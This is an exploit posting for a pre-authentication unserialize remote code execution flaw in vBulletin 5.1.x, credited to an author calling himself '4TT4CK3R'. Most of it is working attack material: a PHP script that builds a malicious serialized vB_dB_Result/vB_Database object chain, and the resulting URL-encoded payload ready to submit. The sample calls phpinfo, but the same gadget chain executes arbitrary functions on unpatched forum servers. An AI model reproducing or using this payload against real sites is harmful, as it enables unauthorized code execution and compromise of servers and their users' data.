[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] ~# : Exploit Title: Vbulletin 5.1.X Unserialize Preauth RCE Exploit ~# : Date: 2015/11/04 ~# : Exploit Author: 4TT4CK3R ~# : Vendor Homepage: http://www.vbulletin.com ~# : Version: 5.1.x ~# : Google Dork : No ~# : Tested on: Kali Linux , Windows 7 , Mozilla Firefox ~# : Build the object !! [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] php << &#039;eof&#039; <?php class vB_Database { public $functions = array(); public function __construct() { $this->functions[&#039;free_result&#039;] = &#039;phpinfo&#039;; } } class vB_dB_Result { protected $db; protected $recordset; public function __construct() { $this->db = new vB_Database(); $this->recordset = 1; } } print urlencode(serialize(new vB_dB_Result())) . "n"; eof O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] ~# : Discovered by : 4TT4CK3R ~# : Special Thanks : amin0461 ~# : Thanks for my BlackHat Friends !! [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]